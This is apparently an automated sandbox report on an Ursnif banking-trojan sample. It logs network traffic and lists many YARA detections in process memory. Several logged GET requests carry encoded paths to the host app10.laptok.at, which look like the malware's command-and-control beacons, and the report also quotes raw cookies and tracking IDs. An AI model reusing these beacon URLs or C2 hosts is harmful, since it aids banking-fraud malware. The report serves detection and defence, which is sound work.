Source: global traffic	HTTP traffic detected: GET /track/cmb/generic?ttd_pid=8m33zk4&ttd_tpi=1 HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,uspAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: match.adsrvr.orgConnection: Keep-AliveCookie: TDID=aa6413c2-4ba3-4951-8cf4-a124e7cfad6b; TDCPM=CAEYBSgCMgsI_s7Dl4vphDoQBTgB
Source: global traffic	HTTP traffic detected: GET /sync?ssp=bidswitch&bidswitch_ssp_id=medianet&bsw_user_id=ed0d0c9d-eb5e-460c-94bd-331d1d38e375 HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,uspAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateConnection: Keep-AliveHost: rtb.mfadsrvr.com
Source: global traffic	HTTP traffic detected: GET /ul_cb/sync?ssp=bidswitch&bidswitch_ssp_id=medianet&bsw_user_id=ed0d0c9d-eb5e-460c-94bd-331d1d38e375 HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,uspAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateConnection: Keep-AliveHost: rtb.mfadsrvr.comCookie: tuuid=8a6d375f-4587-406a-a533-3504255f4e66; c=1633614713; tuuid_lu=1633614713
Source: global traffic	HTTP traffic detected: GET /sync?dsp_id=250&expires=14&user_id=8a6d375f-4587-406a-a533-3504255f4e66&ssp=medianet HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,uspAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateConnection: Keep-AliveHost: x.bidswitch.netCookie: tuuid=ed0d0c9d-eb5e-460c-94bd-331d1d38e375; c=1633614712; tuuid_lu=1633614712
Source: global traffic	HTTP traffic detected: GET /pixel?cs=1&google_nid=media&google_cm=1&google_hm=Mjc2NjE2MzEyNjY4NDEzODAwMFYxMA%3D%3D&google_sc=1 HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=57&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,uspAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: cm.g.doubleclick.netConnection: Keep-AliveCookie: IDE=AHWqTUlHPkNa6plymW9JTgSNVG2qEeIJ_G_IptnSH_2mFtME07xAKM_VEZoF-OQ-Uys
Source: global traffic	HTTP traffic detected: GET /ups/58222/sync?_origin=1&uid=2766163126684138000V10 HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,uspAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateConnection: Keep-AliveHost: pixel.advertising.com
Source: global traffic	HTTP traffic detected: GET /ups/58222/sync?_origin=1&uid=2766163126684138000V10&verify=true HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,uspAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateConnection: Keep-AliveHost: pixel.advertising.comCookie: APID=UPbaae6187-2775-11ec-83da-02a5fb3287ae
Source: global traffic	HTTP traffic detected: GET /ups/58222/sync?_origin=1&uid=2766163126684138000V10 HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,uspAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateConnection: Keep-AliveHost: ups.analytics.yahoo.com
Source: global traffic	HTTP traffic detected: GET /ups/58222/sync?_origin=1&uid=2766163126684138000V10&apid=UPbaae6187-2775-11ec-83da-02a5fb3287ae HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,uspAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateConnection: Keep-AliveHost: ups.analytics.yahoo.com
Source: global traffic	HTTP traffic detected: GET /ups/58222/sync?_origin=1&uid=2766163126684138000V10&verify=true HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,uspAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateConnection: Keep-AliveHost: ups.analytics.yahoo.comCookie: A3=d=AQABBHn7XmECELkmLZa1IAljTGaHi_xBqOMFEgEBAQFMYGFoYQAAAAAA_eMAAA&S=AQAAAi1F1ZX9HUZ5b_X1VfLc_ec; B=99545shglturp&b=3&s=qu
Source: global traffic	HTTP traffic detected: GET /ups/58222/sync?_origin=1&uid=2766163126684138000V10&apid=UPbaae6187-2775-11ec-83da-02a5fb3287ae&verify=true HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,uspAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateConnection: Keep-AliveHost: ups.analytics.yahoo.comCookie: A3=d=AQABBHn7XmECELkmLZa1IAljTGaHi_xBqOMFEgEBAQFMYGFoYQAAAAAA_eMAAA&S=AQAAAi1F1ZX9HUZ5b_X1VfLc_ec; B=e7a21vhglturp&b=3&s=jp
Source: global traffic	HTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fconsole.brax-cdn.com%2Fcreatives%2Fa6cb1edf-85ae-42d3-8ce3-0c3ef2d08771%2F46fb1684-fb46-4b92-97d6-73c06aebbfee_1000x600_bdf0634e74df9e1a3c17cd78afe8adb9.png HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: img.img-taboola.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fconsole.brax-cdn.com%2Fcreatives%2Fa6cb1edf-85ae-42d3-8ce3-0c3ef2d08771%2F679db3c1-e62f-47d5-bd90-53b48f4ed0c6_1000x600_9a0f5b727e2a50702107d4e4fbcb72f2.png HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: img.img-taboola.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fs3.amazonaws.com%2Fshinez-pictures%2F1617177826938a14141d3bca4cb41620f72354f58c4ff.jpg HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: img.img-taboola.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F171f8b8d6097fca0bfa9b18571e0f954.jpg HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: img.img-taboola.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fb3b730df929ed7084f256b53000dc655.jpg HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: img.img-taboola.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fceedb38b7c05f6380193a62666745514.jpg HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: img.img-taboola.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /iyCuS9ekK6/ZKYlS2pL4_2F6YN5g/m2OzU2ez_2Fk/8F_2BnXwn7_/2BP90eUCGBXbRD/RIrhhRbIti7z5YuR4sWSi/epontKgntd3dejbE/4HUFCBnhPXzMXu2/uZ4C1mmtL8vyVF2uY5/jVMd1l3Jh/x4JupkgAYc9HSuaowzvE/VVWENV7cepnquu_2Fad/hpeYK_2BWzJKa_2BOghWOX/oxGEacWNQdGQC/A6Cks_2F/uCy09i_2F1Tm3pYwDufmBHp/hIUmxpzNN2/hckwDljGIXjYYf_2F/CNoayANu_2Bs/LgXcLBGeCG9/yBRWVpnUTSUqib2fLN/OUCgu HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: app10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: app10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /PdcGcGQosorY2QVhs_2/Bq9ScRQL0MmNo2gJrOrbiG/FDPb27Vu9hQGu/uY_2BMGI/NhNPnwzZnvYmoE7OGPBLQde/_2BY7mjJDF/ENcdEwVrEZJmnckQF/xH_2FgB8NMkY/CX5URbB5Mx9/tUnqO1qk0bc_2F/PzDjrCOWN7DecUA5P73Ps/FXVrTQO1zHZWe16C/R7nFvrjBN_2FbS0/Sy3O7HQGtcelrr3wGg/pY1rVDRtB/mUtxf1LfEhQfplP_2BGc/zeFFWNWagrH7B9kDL9x/Qcq2Cq8xJzMSz1YJbgWaq6/2niybL0WpOiiM/8AGzUeTW/_2FJcei9yt9KTfGqe2YPREu/h11 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: app10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: app10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /KiETfhAdcEl7/hLoS0_2BEdS/nu4Yf9GnANVyXk/YgUltJ7zs6xEJ2nloxeBs/eATUXgJAO922GcgP/GiUgV17y_2BdX4O/qFWwhpMGMf37wi_2BX/lkJe3cdrN/7WVmaELlUteTQIErFhWc/URRkn6I1CeKadfr0Tg_/2BWPYNHHR_2F2UImJAlhjY/i7YonJ3Ydwnd_/2BgOgiB9/MYuujPMMxg18nymjpE2JqFD/0fVq8D9YsD/phg5UsKLZOQl7kqi1/VTS_2FsAFu3G/3TrEzzwsBKW/3MeaiWTLCHCZlD/OY9S51u3L9nBtrZ_2BZx7/0yqRxDj4x6MboGVE/Q0bFKfsJ98F/gfX HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: app10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /tej6GHOV/2OZDNZM15j8d4LuzyBm1CPL/pFWNHMsgBq/Me_2BiCKfGmnsgtGg/Rke8C0lda6PN/mYOR8uYOgwt/6eDC9ufg4E5RLJ/VOnxrPlZG6FiNtHGLC5WH/SdTzqrBTR2p_2Fsz/3qaz2VU319DSvXM/bXNaVzi_2BhoNpjBto/CdRkBvfA0/fgYhpjExPXJDXoMrOLKj/_2BnxOA04HyPM26GFwn/mFc4so9IwBrMFkh7WH8no2/C7B38PnerqkdM/EgzIMhoK/Lnz3duCdEuM_2FN4IA_2F8v/u68N1tKS6F/4NEjvBzDbxJ7ghRIM/SCFXI7ZJd_2B/V2Z4tsab_2F/VPR0GKd HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: app10.laptok.atConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.4:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.4:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.4:49790 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.4:49791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.69.19:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.69.19:443 -> 192.168.2.4:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.38:443 -> 192.168.2.4:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.38:443 -> 192.168.2.4:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.203.98:443 -> 192.168.2.4:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.203.98:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.156.81.187:443 -> 192.168.2.4:49813 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.156.81.187:443 -> 192.168.2.4:49812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.174.68:443 -> 192.168.2.4:49815 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.174.68:443 -> 192.168.2.4:49814 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 76.223.111.131:443 -> 192.168.2.4:49820 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 76.223.111.131:443 -> 192.168.2.4:49819 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.195.217.206:443 -> 192.168.2.4:49822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.195.217.206:443 -> 192.168.2.4:49823 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.197.99.6:443 -> 192.168.2.4:49836 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.197.99.6:443 -> 192.168.2.4:49835 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.156.0.31:443 -> 192.168.2.4:49838 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.156.0.31:443 -> 192.168.2.4:49837 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49847 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49848 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49850 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49849 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49852 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000003.908592285.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.986796014.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.919043739.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.986936455.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.986844701.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.908402373.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.986951614.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.908284836.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.862882724.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.919333557.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1183574804.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.862687156.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.919382135.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.863055809.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.862929900.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.986702942.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.908521770.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.862999025.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.986736746.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.918914357.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.908362779.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.986915722.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.862717977.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1182966669.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.986870790.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.918874706.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.863040607.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1182360393.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.908553310.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.862644494.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.919207187.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.918946609.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.908608901.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.919351635.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.908487582.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1182795536.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 5692, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 1576, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 3436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 3160, type: MEMORYSTR
Source: Yara match	File source: 3.2.rundll32.exe.32e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.6b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6e050000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.fc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.6e050000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.a70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.6e050000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.50d94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.10f94a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.regsvr32.exe.bb8d06.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6e050000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.6b8d06.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4cb94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.30a94a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4cb94a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.30a94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.ff8d06.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.50d94a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.10f94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.32c8d06.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.1181352410.00000000010F9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.800171088.0000000000BB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1182185098.00000000030A9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1183218956.00000000050D9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.810323284.0000000000FF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.806401680.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.804569099.00000000032C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1182699282.0000000004CB9000.00000004.00000040.sdmp, type: MEMORY

Source: loaddll32.exe, 00000000.00000002.1180780881.00000000011DB000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000003.908592285.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.986796014.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.919043739.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.986936455.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.986844701.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.908402373.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.986951614.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.908284836.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.862882724.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.919333557.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1183574804.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.862687156.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.919382135.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.863055809.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.862929900.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
